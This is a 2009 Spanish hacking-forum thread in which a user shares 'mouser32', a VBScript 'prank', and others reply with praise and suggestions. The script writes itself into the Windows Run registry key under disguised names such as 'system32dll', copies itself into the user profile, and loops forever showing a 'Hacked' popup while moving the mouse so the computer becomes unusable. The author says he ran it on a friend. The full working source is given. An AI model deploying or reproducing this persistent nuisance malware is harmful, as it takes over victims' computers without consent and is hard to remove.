elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [BromaVBS] mouser32 - by xassiz!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [BromaVBS] mouser32 - by xassiz!  (Leído 4,325 veces)
xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
[BromaVBS] mouser32 - by xassiz!
« en: 15 Septiembre 2009, 22:00 pm »

Bueno, gracias a NovLucker llegué a hacer una broma en vbs (que la probé con un amigo y realmente funciona XD XD XD).. aprendí bastante al hacer esto ;D

Citar
-Se agrega al Run para iniciarse con el pc
-Se autocopia
-Agrega tambien al Run la copia por si se borra el original
-Muestra un popup con un mensaje
-Mueve el mouse cada medio segundo para diferentes sitios, de manera que no lo puedes utilizar xD
-Comienza un bucle infinito, vuelve a mostrar el popup, vuelve a mover el mouse, etc. etc. etc. :laugh:

Código:
'Mouser32 - by xassiz
''broma sobre el mouse

set registro = createobject("wscript.shell")
registro.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\system32dll",wscript.scriptfullname,"REG_SZ"
set autocopia = createobject("scripting.filesystemobject")
set varentorno = createobject("wscript.shell")
userprofile = varentorno.expandenvironmentstrings("%userprofile%")
autocopia.copyfile wscript.scriptfullname, userprofile & "\mouser32.vbs", true
set registro2 = createobject("wscript.shell")
registro2.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\system32exe,"wscript.scriptfullname,"REG_SZ"
do
Set hacked=createobject("Wscript.shell")
set broma=CreateObject("Excel.Application")
mensaje=hacked.popup("Welcome to the hell.. the mouser32!!",1,"Hacked by xassiz!",16)
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""100"", ""100"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""50"", ""200"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""200"", ""300"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""50"", ""400"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""600"", ""500"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""50"", ""600"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""700"", ""800"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""350"", ""200"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""100"", ""100"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""50"", ""200"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""200"", ""300"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""50"", ""400"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""600"", ""500"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""50"", ""600"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""700"", ""800"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""350"", ""200"")")
wscript.sleep 500
mouse=broma.ExecuteExcel4Macro("CALL(""user32"",""SetCursorPos"", ""JJJJ"", ""850"", ""1000"")")
set broma=Nothing
loop

Espero correcciones, criticas y mejoras  :rolleyes: ;D


Graciaaas! ::)


En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
peib0l
Wiki

Desconectado Desconectado

Mensajes: 3.493


freedom


Ver Perfil WWW
Re: [BromaVBS] mouser32 - by xassiz!
« Respuesta #1 en: 20 Septiembre 2009, 09:27 am »

jaja bonita la broma  :xD  pero una cosa tu le estas dando las coordenadas a donde se tene que mover el raton, no seria mejor que fuera aleatorio? de esa forma te ahorrarias buen trozo de codigo


En línea

0x5d

Desconectado Desconectado

Mensajes: 241



Ver Perfil WWW
Re: [BromaVBS] mouser32 - by xassiz!
« Respuesta #2 en: 21 Septiembre 2009, 04:43 am »

Lindo code, funciona bien ;)

Saludos.
En línea

xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: [BromaVBS] mouser32 - by xassiz!
« Respuesta #3 en: 21 Septiembre 2009, 19:16 pm »

jaja bonita la broma  :xD  pero una cosa tu le estas dando las coordenadas a donde se tene que mover el raton, no seria mejor que fuera aleatorio? de esa forma te ahorrarias buen trozo de codigo

A mi me da igual, yo probe el code y sudé para pararlo xDD
En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines